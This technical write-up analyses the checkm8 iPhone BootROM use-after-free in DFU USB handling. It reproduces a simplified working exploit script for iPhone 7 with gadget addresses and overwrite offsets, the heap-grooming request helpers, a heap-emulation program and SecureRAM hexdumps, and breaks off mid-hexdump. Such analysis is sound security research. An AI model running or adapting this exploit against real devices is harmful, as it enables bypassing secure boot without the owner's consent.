Most likely you've already heard about the famous exploit checkm8, which uses an unfixable vulnerability in the BootROM of most iDevices, including iPhone X . In this article, we'll provide a technical analysis of this exploit and figure out what causes the vulnerability.

You can read the Russian version here.

Introduction

First, let's briefly describe the booting process of an iDevice and the role BootROM (a.k.a. SecureROM ) plays in it. Detailed information about it can be found here. Here's what booting looks like:

When the device is turned on, BootROM is executed first. Its main tasks are:

Platform initialization (necessary platform registers are installed, CPU is initialized, etc.)

is initialized, etc.) Verification and transfer of control to the next stage

BootROM supports the parsing of IMG3/IMG4 images BootROM has access to the GID key for decrypting images for image verification, BootROM has a built-in public Apple key and necessary cryptographic functionality

Restore the device if further booting isn't possible ( Device Firmware Update , DFU ).

BootROM has a very small size and can be called a light version of iBoot , as they share most of the system and library code. Although, unlike iBoot , BootROM cannot be updated. It is put in the internal read-only memory when a device is manufactured. BootROM is the hardware root of trust of the secure boot chain. BootROM vulnerabilities may allow an attacker to control the booting process and execute unsigned code on a device.

The history of checkm8

The checkm8 exploit was added to ipwndfu by its author axi0mX on September 27, 2019. At the same time, he announced the update on Twitter and provided a description and additional information about the exploit. According to the thread, he found the use-after-free vulnerability in the USB code while patch diffing iBoot for iOS 12 beta in the summer of 2018.

BootROM and iBoot share most of their code, including USB , so this vulnerability is also relevant for BootROM .

As follows from the exploit's code, the vulnerability is exploited in DFU . This is a mode in which one can transfer a signed image to a device via USB that will be booted later. For example, this can be useful for restoring a device after an unsuccessful update.

On the same day, the user littlelailo said that he had found that vulnerability back in March and published a description in apollo.txt. The description corresponded with checkm8 , although not all the details of the exploit become clear upon reading it. This is why we decided to write this article and describe all the details of exploitation up to the execution of the payload in BootROM .

We based our analysis of the exploit on the resources mentioned above and the source code of iBoot/SecureROM , which was leaked in February 2018. We also used the data we got from the experiments done on our test device, iPhone 7 ( CPID:8010 ). Using, checkm8 , we got the dumps of SecureROM and SecureRAM , which were also helpful for the analysis.

Necessary info about USB

Since the vulnerability is in the USB code, it is necessary to understand how this interface works. Full specs can be found at https://www.usb.org/, but it's a long read. For our purposes, USB in a NutShell is more than enough. Here, we'll mention only the most relevant points.

There are various types of USB data transfer. In DFU , only Control Transfers mode is used (read more about it here). In this mode, each transaction has 3 stages:

Setup Stage — a SETUP packet is sent; it has the following fields:

bmRequestType — defines the direction of the request, its type, and the recipient bRequest — defines the request to be made wValue , wIndex — are interpreted depending on the request wLength — specifies the length of the sent/received data in Data Stage

— a packet is sent; it has the following fields: Data Stage — an optional stage of data transfer. Depending on the SETUP packet sent during the Setup Stage , the data can be sent from host to device ( OUT ) or vice versa ( IN ). The data is sent in small portions (in case of Apple DFU , it's 0x40 bytes).

When a host wants to send another portion of data, it sends an OUT token and then the data itself. When a host is ready to receive data from a device, it sends an IN token to the device.

— an optional stage of data transfer. Depending on the packet sent during the , the data can be sent from host to device ( ) or vice versa ( ). The data is sent in small portions (in case of , it's 0x40 bytes). Status Stage — the last stage; the status of the whole transaction is reported.

For OUT requests, the host sends an IN token to which the device must respond with a zero-length packet. For IN requests, the host sends an OUT token and a zero-length packet.

— the last stage; the status of the whole transaction is reported.

The scheme below shows OUT and IN requests. We took out ACK , NACK , and other handshake packets on purpose, as they are not important for the exploit itself.

Analysis of apollo.txt

We began the analysis with the vulnerability from apollo.txt. The document describes the algorithm of the DFU mode:

https://gist.github.com/littlelailo/42c6a11d31877f98531f6d30444f59c4

When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer it then returns wLength which is the length it wants to recieve into the buffer the usb main code then updates a global var with the length and gets ready to recieve the data packages if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already if all the data was recieved the dfu specific code is called again and that then goes on to copy the contents of the input output buffer to the memory location from where the image is later booted after that the usb code resets all variables and goes on to handel new packages if dfu exits the input output buffer is freed and if parsing of the image fails bootrom reenters dfu



First, we checked these steps against the source code of iBoot . We can't use the fragments of the leaked code here, so we'll use pseudocode we got from reverse-engineering the SecureROM of our iPhone7 in IDA . You can easily find the source code of iBoot and navigate it.

When DFU is initialized, an IO buffer is allocated, and a USB interface for processing the requests to DFU is registered:

When the SETUP packet of a request to DFU comes in, a proper interface handler is called. For OUT requests (e.g., when an image is sent), in case of successful execution, the handler has to return the address of the IO buffer for the transaction as well as the length of data it expects to receive. Both values are stored in global variables.

The screenshot below shows the DFU interface handler. If a request is correct, then the address of the IO buffer allocated during the DFU initialization and the expected length of data from the SETUP packet are returned.

During the Data Stage , each portion of data is written to the IO buffer, and then the IO buffer address is offset and the received counter is updated. When all expected data is received, the interface data handler is called and the global state of the transaction is cleared.

In the DFU data handler, the received data is moved to the memory area from which it will be loaded later. Based on the source code of iBoot , this area on Apple devices is called INSECURE_MEMORY .

When the device exits the DFU mode, the previously allocated IO buffer is freed. If the image was successfully acquired in the DFU mode, it will be verified and booted. If there was any error or it was impossible to boot the image, the DFU will be initialized again, and the whole process will repeat from the beginning.

The described algorithm has a use-after-free vulnerability. If we send a SETUP packet at the time of image uploading and complete the transaction skipping Data Stage , the global state will remain initialized during the next DFU cycle, and we will be able to write to the address of the IO buffer allocated during the previous iteration of DFU .

Now that we know how use-after-free works, the question is, how can we overwrite anything during the next iteration of the DFU ? Before another initialization of the DFU , all the previously allocated resources are freed and the allocation of memory in a new iteration has to be exactly the same. As it turned out, there's another interesting memory leak error that allows exploiting use-after-free .

Analysis of checkm8

Let's get to checkm8 itself. For the sake of demonstration, we'll use a simplified version of the exploit for iPhone 7 , where we took out all code related to other platforms and changed the order and types of USB requests without any damage to its functionality. We also got rid of the process of building a payload, which can be found in the original file, checkm8.py . It's easy to spot the differences between the versions for other devices.

#!/usr/bin/env python from checkm8 import * def main(): print '*** checkm8 exploit by axi0mX ***' device = dfu.acquire_device(1800) start = time.time() print 'Found:', device.serial_number if 'PWND:[' in device.serial_number: print 'Device is already in pwned DFU Mode. Not executing exploit.' return payload, _ = exploit_config(device.serial_number) t8010_nop_gadget = 0x10000CC6C callback_chain = 0x1800B0800 t8010_overwrite = '\0' * 0x5c0 t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain) # heap feng-shui stall(device) leak(device) for i in range(6): no_leak(device) dfu.usb_reset(device) dfu.release_device(device) # set global state and restart usb device = dfu.acquire_device() device.serial_number libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001) libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) dfu.release_device(device) time.sleep(0.5) # heap occupation device = dfu.acquire_device() device.serial_number stall(device) leak(device) leak(device) libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50) for i in range(0, len(payload), 0x800): libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 50) dfu.usb_reset(device) dfu.release_device(device) device = dfu.acquire_device() if 'PWND:[checkm8]' not in device.serial_number: print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.' sys.exit(1) print 'Device is now in pwned DFU Mode.' print '(%0.2f seconds)' % (time.time() - start) dfu.release_device(device) if __name__ == '__main__': main()

The operation of checkm8 has several stages:

Heap feng-shui Allocation and freeing of the IO buffer without clearing the global state Overwriting usb_device_io_request in the heap with use-after-free Placing the payload Execution of callback-chain Execution of shellcode

Let's look at all stages in detail.

1. Heap feng-shui

We think it's the most interesting stage, so we'll spend more time describing it.

stall(device) leak(device) for i in range(6): no_leak(device) dfu.usb_reset(device) dfu.release_device(device)

This stage is necessary for arranging the heap in a way that is beneficial for the exploitation of use-after-free . First, let's consider the calls stall , leak , no_leak :

def stall(device): libusb1_async_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 'A' * 0xC0, 0.00001) def leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC0, 1) def no_leak(device): libusb1_no_error_ctrl_transfer(device, 0x80, 6, 0x304, 0x40A, 0xC1, 1)

libusb1_no_error_ctrl_transfer is a wrapper for device.ctrlTransfer ignoring all exceptions arising during the execution of a request. libusb1_async_ctrl_transfer is a wrapper for the libusb_submit_transfer function from libusb for the asynchronous execution of a reqeust.

The following parameters are passed to these calls:

Device number

Data for the SETUP packet (here you can find the description):

bmRequestType bRequest wValue wIndex

packet (here you can find the description): Length of data ( wLength ) or data for the Data Stage

) or data for the Request timeout

Arguments bmRequestType , bRequest , wValue , and wIndex are shared by all three request types:

bmRequestType = 0x80

0b1XXXXXXX — direction of Data Stage (Device to Host) 0bX00XXXXX — standard request type 0bXXX00000 — device is the recipient of the request

bRequest = 6 — request to get a descriptor ( GET_DESCRIPTOR )

— request to get a descriptor ( ) wValue = 0x304

wValueHigh = 0x3 — defines the type of the descriptor — string ( USB_DT_STRING ) wValueLow = 0x4 — index of the string descriptor, 4, corresponds to the device serial number (in this case, the string is CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0C ECID:001A40362045E526 IBFL:3C SRTG:[iBoot-2696.0.0.1.33] )

wIndex = 0x40A — the indentifer of the string's language, whose value is not relevant to exploitation and can be changed.

For any of these requests, 0x30 bytes are allocated in the heap for an object of the following structure:

The most interesting fields of this object are callback and next .

callback is the pointer to the function that will be called when the request is done.

is the pointer to the function that will be called when the request is done. next is the pointer to the next object of the same type; it is necessary for organizing the request queue.

The key feature of stall is its use of asynchronous execution of a request with a minimum timeout. That is why, if we are lucky, the request will be canceled on the OS level and remain in the execution queue, and the transaction won't be complete. Plus, the device will continue receiving all the upcoming SETUP packets and place them, when necessary, in the execution queue. Later, experimenting with the USB controller on Arduino , we found out that for successful exploitation we need the host to send a SETUP packet and an IN token, after which the transaction has to be canceled due to timeout. This incomplete transaction looks like this:

Besides that, the requests only differ in length by one unit. For standard requests, there is a standard callback that looks like this:

The value of io_length is equal to the minimum from wLength in the request's SETUP packet and the original length of the requested descriptor. Due to the descriptor being quite long, we can control the value of io_length within its length. The value of g_setup_request.wLength is equal to the value of wLength from the last SETUP packet. In this case, it's 0xC1 .

Thus, the requests formed by the calls stall and leak are completed, the condition in the terminal callback function is satisfied, and usb_core_send_zlp() is called. This call creates a null packet ( zero-length-packet ) and adds it to the execution queue. This is necessary for the correct completion of the transaction in Status Stage .

The request is completed by calling the function usb_core_complete_endpoint_io . First, it calls callback and then frees the request's memory. The request is complete not only when the whole transaction is complete, but also when USB is reset. When the signal for resetting USB is received, all the requests in the execution queue will be completed.

By selectively calling usb_core_send_zlp() when going through the execution queue and freeing the requests afterward, we can gain sufficient control over the heap for the exploitation of use-after-free . First, let's look at the request cleanup loop:

As you can see, the queue is emptied, and then the canceled requests are run and completed by usb_core_complete_endpoint_io . The requests allocated by usb_core_send_zlp are placed into ep->io_head . After the USB reset is done, all information about the endpoint will be clear, including the pointers io_head and io_tail , and the zero-length requests will remain in the heap. Thus, we can create a small chunk amidst the heap. The scheme below shows how it's done:

In the heap of SecureROM , a new memory area is allocated from the smallest proper free chunk. By creating a small free chunk using the method described above, we can control the allocation of memory during the USB initialization, including the allocation of the io_buffer and requests.

To have a better understanding of this, let's see which requests to the heap are made when DFU is initialized. During the analysis of the iBoot source code and reverse-engineering of SecureROM , we got the following sequence:

Allocation of various string descriptors

1.1. Nonce (size 234 ) 1.2. Manufacturer ( 22 ) 1.3. Product ( 62 ) 1.4. Serial Number ( 198 ) 1.5. Configuration string ( 62 )



Allocations related to the creation of the USB controller task

2.1. Task structure ( 0x3c0 ) 2.2. Task stack ( 0x1000 )



io_buffer ( 0x800 )



Configuration descriptors

4.1. High-Speed ( 25 ) 4.2. Full-Speed ( 25 )





Then, request structures are allocated. If there's a small chunk in the heap, some allocations of the first category will go there, and all other allocations will move. Thus, we will be able to overflow usb_device_io_request by referring to the old buffer. It looks like this:

To calculate the necessary offset, we simply emulated all the allocations listed above and adapted the source code of the iBoot heap a little.

Emulating requests to the heap in DFU #include "heap.h" #include <stdio.h> #include <unistd.h> #include <sys/mman.h> #ifndef NOLEAK #define NOLEAK (8) #endif int main() { void * chunk = mmap((void *)0x1004000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("chunk = %p

", chunk); heap_add_chunk(chunk, 0x100000, 1); malloc(0x3c0); // alignment of the low order bytes of addresses in SecureRAM void * descs[10]; void * io_req[100]; descs[0] = malloc(234); descs[1] = malloc(22); descs[2] = malloc(62); descs[3] = malloc(198); descs[4] = malloc(62); const int N = NOLEAK; void * task = malloc(0x3c0); void * task_stack = malloc(0x4000); void * io_buf_0 = memalign(0x800, 0x40); void * hs = malloc(25); void * fs = malloc(25); void * zlps[2]; for(int i = 0; i < N; i++) { io_req[i] = malloc(0x30); } for(int i = 0; i < N; i++) { if(i < 2) { zlps[i] = malloc(0x30); } free(io_req[i]); } for(int i = 0; i < 5; i++) { printf("descs[%d] = %p

", i, descs[i]); } printf("task = %p

", task); printf("task_stack = %p

", task_stack); printf("io_buf = %p

", io_buf_0); printf("hs = %p

", hs); printf("fs = %p

", fs); for(int i = 0; i < 2; i++) { printf("zlps[%d] = %p

", i, zlps[i]); } printf("**********

"); for(int i = 0; i < 5; i++) { free(descs[i]); } free(task); free(task_stack); free(io_buf_0); free(hs); free(fs); descs[0] = malloc(234); descs[1] = malloc(22); descs[2] = malloc(62); descs[3] = malloc(198); descs[4] = malloc(62); task = malloc(0x3c0); task_stack = malloc(0x4000); void * io_buf_1 = memalign(0x800, 0x40); hs = malloc(25); fs = malloc(25); for(int i = 0; i < 5; i++) { printf("descs[%d] = %p

", i, descs[i]); } printf("task = %p

", task); printf("task_stack = %p

", task_stack); printf("io_buf = %p

", io_buf_1); printf("hs = %p

", hs); printf("fs = %p

", fs); for(int i = 0; i < 5; i++) { io_req[i] = malloc(0x30); printf("io_req[%d] = %p

", i, io_req[i]); } printf("**********

"); printf("io_req_off = %#lx

", (int64_t)io_req[0] - (int64_t)io_buf_0); printf("hs_off = %#lx

", (int64_t)hs - (int64_t)io_buf_0); printf("fs_off = %#lx

", (int64_t)fs - (int64_t)io_buf_0); return 0; }

The output of the program with 8 requests at the heap feng-shui stage:

chunk = 0x1004000 descs[0] = 0x1004480 descs[1] = 0x10045c0 descs[2] = 0x1004640 descs[3] = 0x10046c0 descs[4] = 0x1004800 task = 0x1004880 task_stack = 0x1004c80 io_buf = 0x1008d00 hs = 0x1009540 fs = 0x10095c0 zlps[0] = 0x1009a40 zlps[1] = 0x1009640 ********** descs[0] = 0x10096c0 descs[1] = 0x1009800 descs[2] = 0x1009880 descs[3] = 0x1009900 descs[4] = 0x1004480 task = 0x1004500 task_stack = 0x1004900 io_buf = 0x1008980 hs = 0x10091c0 fs = 0x1009240 io_req[0] = 0x10092c0 io_req[1] = 0x1009340 io_req[2] = 0x10093c0 io_req[3] = 0x1009440 io_req[4] = 0x10094c0 ********** io_req_off = 0x5c0 hs_off = 0x4c0 fs_off = 0x540

As you can see, another usb_device_io_request will appear at the offset of 0x5c0 from the beginning of the previous buffer, which corresponds to the exploit's code:

t8010_overwrite = '\0' * 0x5c0 t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)

You can check the validity of these conclusions by analyzing the current status of the SecureRAM heap, which we got with checkm8 . For this purpose, we wrote a simple script that parses the heap's dump and enumerates the chunks. Keep in mind that during the usb_device_io_request overflow, part of the metadata was damaged, so we skip it during the analysis.

#!/usr/bin/env python3 import struct from hexdump import hexdump with open('HEAP', 'rb') as f: heap = f.read() cur = 0x4000 def parse_header(cur): _, _, _, _, this_size, t = struct.unpack('<QQQQQQ', heap[cur:cur + 0x30]) is_free = t & 1 prev_free = (t >> 1) & 1 prev_size = t >> 2 this_size *= 0x40 prev_size *= 0x40 return this_size, is_free, prev_size, prev_free while True: try: this_size, is_free, prev_size, prev_free = parse_header(cur) except Exception as ex: break print('chunk at', hex(cur + 0x40)) if this_size == 0: if cur in (0x9180, 0x9200, 0x9280): # skipping damaged chunks this_size = 0x80 else: break print(hex(this_size), 'free' if is_free else 'non-free', hex(prev_size), prev_free) hexdump(heap[cur + 0x40:cur + min(this_size, 0x100)]) cur += this_size

The output of the script with comments can be found under the spoiler. You can see that the low order bytes match the results of emulation.

The result of parsing the heap in SecureRAM chunk at 0x4040 0x40 non-free 0x0 0 chunk at 0x4080 0x80 non-free 0x40 0 00000000: 00 41 1B 80 01 00 00 00 00 00 00 00 00 00 00 00 .A.............. 00000010: 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 ................ 00000020: FF 00 00 00 00 00 00 00 68 3F 08 80 01 00 00 00 ........h?...... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x4100 0x140 non-free 0x80 0 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4240 0x240 non-free 0x140 0 00000000: 68 6F 73 74 20 62 72 69 64 67 65 00 00 00 00 00 host bridge..... 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4480 // descs[4], conf string 0x80 non-free 0x240 0 00000000: 3E 03 41 00 70 00 70 00 6C 00 65 00 20 00 4D 00 >.A.p.p.l.e. .M. 00000010: 6F 00 62 00 69 00 6C 00 65 00 20 00 44 00 65 00 o.b.i.l.e. .D.e. 00000020: 76 00 69 00 63 00 65 00 20 00 28 00 44 00 46 00 v.i.c.e. .(.D.F. 00000030: 55 00 20 00 4D 00 6F 00 64 00 65 00 29 00 FE FF U. .M.o.d.e.)... chunk at 0x4500 // task 0x400 non-free 0x80 0 00000000: 6B 73 61 74 00 00 00 00 E0 01 08 80 01 00 00 00 ksat............ 00000010: E8 83 08 80 01 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4900 // task stack 0x4080 non-free 0x400 0 00000000: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000010: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000020: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000030: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000040: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000050: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000060: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000070: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000080: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000090: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 000000A0: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 000000B0: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats chunk at 0x8980 // io_buf 0x840 non-free 0x4080 0 00000000: 63 6D 65 6D 63 6D 65 6D 00 00 00 00 00 00 00 00 cmemcmem........ 00000010: 10 00 0B 80 01 00 00 00 00 00 1B 80 01 00 00 00 ................ 00000020: EF FF 00 00 00 00 00 00 10 08 0B 80 01 00 00 00 ................ 00000030: 4C CC 00 00 01 00 00 00 20 08 0B 80 01 00 00 00 L....... ....... 00000040: 4C CC 00 00 01 00 00 00 30 08 0B 80 01 00 00 00 L.......0....... 00000050: 4C CC 00 00 01 00 00 00 40 08 0B 80 01 00 00 00 L.......@....... 00000060: 4C CC 00 00 01 00 00 00 A0 08 0B 80 01 00 00 00 L............... 00000070: 00 06 0B 80 01 00 00 00 6C 04 00 00 01 00 00 00 ........l....... 00000080: 00 00 00 00 00 00 00 00 78 04 00 00 01 00 00 00 ........x....... 00000090: 00 00 00 00 00 00 00 00 B8 A4 00 00 01 00 00 00 ................ 000000A0: 00 00 0B 80 01 00 00 00 E4 03 00 00 01 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 34 04 00 00 01 00 00 00 ........4....... chunk at 0x91c0 // hs config 0x80 non-free 0x0 0 00000000: 09 02 19 00 01 01 05 80 FA 09 04 00 00 00 FE 01 ................ 00000010: 00 00 07 21 01 0A 00 00 08 00 00 00 00 00 00 00 ...!............ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x9240 // ls config 0x80 non-free 0x0 0 00000000: 09 02 19 00 01 01 05 80 FA 09 04 00 00 00 FE 01 ................ 00000010: 00 00 07 21 01 0A 00 00 08 00 00 00 00 00 00 00 ...!............ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x92c0 0x80 non-free 0x0 0 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 6C CC 00 00 01 00 00 00 00 08 0B 80 01 00 00 00 l............... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9340 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF C0 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 48 DE 00 00 01 00 00 00 C0 93 1B 80 01 00 00 00 H............... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x93c0 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 40 94 1B 80 01 00 00 00 ........@....... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9440 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x94c0 0x180 non-free 0x80 0 00000000: E4 03 43 00 50 00 49 00 44 00 3A 00 38 00 30 00 ..C.P.I.D.:.8.0. 00000010: 31 00 30 00 20 00 43 00 50 00 52 00 56 00 3A 00 1.0. .C.P.R.V.:. 00000020: 31 00 31 00 20 00 43 00 50 00 46 00 4D 00 3A 00 1.1. .C.P.F.M.:. 00000030: 30 00 33 00 20 00 53 00 43 00 45 00 50 00 3A 00 0.3. .S.C.E.P.:. 00000040: 30 00 31 00 20 00 42 00 44 00 49 00 44 00 3A 00 0.1. .B.D.I.D.:. 00000050: 30 00 43 00 20 00 45 00 43 00 49 00 44 00 3A 00 0.C. .E.C.I.D.:. 00000060: 30 00 30 00 31 00 41 00 34 00 30 00 33 00 36 00 0.0.1.A.4.0.3.6. 00000070: 32 00 30 00 34 00 35 00 45 00 35 00 32 00 36 00 2.0.4.5.E.5.2.6. 00000080: 20 00 49 00 42 00 46 00 4C 00 3A 00 33 00 43 00 .I.B.F.L.:.3.C. 00000090: 20 00 53 00 52 00 54 00 47 00 3A 00 5B 00 69 00 .S.R.T.G.:.[.i. 000000A0: 42 00 6F 00 6F 00 74 00 2D 00 32 00 36 00 39 00 B.o.o.t.-.2.6.9. 000000B0: 36 00 2E 00 30 00 2E 00 30 00 2E 00 31 00 2E 00 6...0...0...1... chunk at 0x9640 // zlps[1] 0x80 non-free 0x180 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x96c0 // descs[0], Nonce 0x140 non-free 0x80 0 00000000: EA 03 20 00 4E 00 4F 00 4E 00 43 00 3A 00 35 00 .. .N.O.N.C.:.5. 00000010: 35 00 46 00 38 00 43 00 41 00 39 00 37 00 41 00 5.F.8.C.A.9.7.A. 00000020: 46 00 45 00 36 00 30 00 36 00 43 00 39 00 41 00 F.E.6.0.6.C.9.A. 00000030: 41 00 31 00 31 00 32 00 44 00 38 00 42 00 37 00 A.1.1.2.D.8.B.7. 00000040: 43 00 46 00 33 00 35 00 30 00 46 00 42 00 36 00 C.F.3.5.0.F.B.6. 00000050: 35 00 37 00 36 00 43 00 41 00 41 00 44 00 30 00 5.7.6.C.A.A.D.0. 00000060: 38 00 43 00 39 00 35 00 39 00 39 00 34 00 41 00 8.C.9.5.9.9.4.A. 00000070: 46 00 32 00 34 00 42 00 43 00 38 00 44 00 32 00 F.2.4.B.C.8.D.2. 00000080: 36 00 37 00 30 00 38 00 35 00 43 00 31 00 20 00 6.7.0.8.5.C.1. . 00000090: 53 00 4E 00 4F 00 4E 00 3A 00 42 00 42 00 41 00 S.N.O.N.:.B.B.A. 000000A0: 30 00 41 00 36 00 46 00 31 00 36 00 42 00 35 00 0.A.6.F.1.6.B.5. 000000B0: 31 00 37 00 45 00 31 00 44 00 33 00 39 00 32 00 1.7.E.1.D.3.9.2. chunk at 0x9800 // descs[1], Manufacturer 0x80 non-free 0x140 0 00000000: 16 03 41 00 70 00 70 00 6C 00 65 00 20 00 49 00 ..A.p.p.l.e. .I. 00000010: 6E 00 63 00 2E 00 D6 D7 D8 D9 DA DB DC DD DE DF n.c............. 00000020: E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9880 // descs[2], Product 0x80 non-free 0x80 0 00000000: 3E 03 41 00 70 00 70 00 6C 00 65 00 20 00 4D 00 >.A.p.p.l.e. .M. 00000010: 6F 00 62 00 69 00 6C 00 65 00 20 00 44 00 65 00 o.b.i.l.e. .D.e. 00000020: 76 00 69 00 63 00 65 00 20 00 28 00 44 00 46 00 v.i.c.e. .(.D.F. 00000030: 55 00 20 00 4D 00 6F 00 64 00 65 00 29 00 FE FF U. .M.o.d.e.)... chunk at 0x9900 // descs[3], Serial number 0x140 non-free 0x80 0 00000000: C6 03 43 00 50 00 49 00 44 00 3A 00 38 00 30 00 ..C.P.I.D.:.8.0. 00000010: 31 00 30 00 20 00 43 00 50 00 52 00 56 00 3A 00 1.0. .C.P.R.V.:. 00000020: 31 00 31 00 20 00 43 00 50 00 46 00 4D 00 3A 00 1.1. .C.P.F.M.:. 00000030: 30 00 33 00 20 00 53 00 43 00 45 00 50 00 3A 00 0.3. .S.C.E.P.:. 00000040: 30 00 31 00 20 00 42 00 44 00 49 00 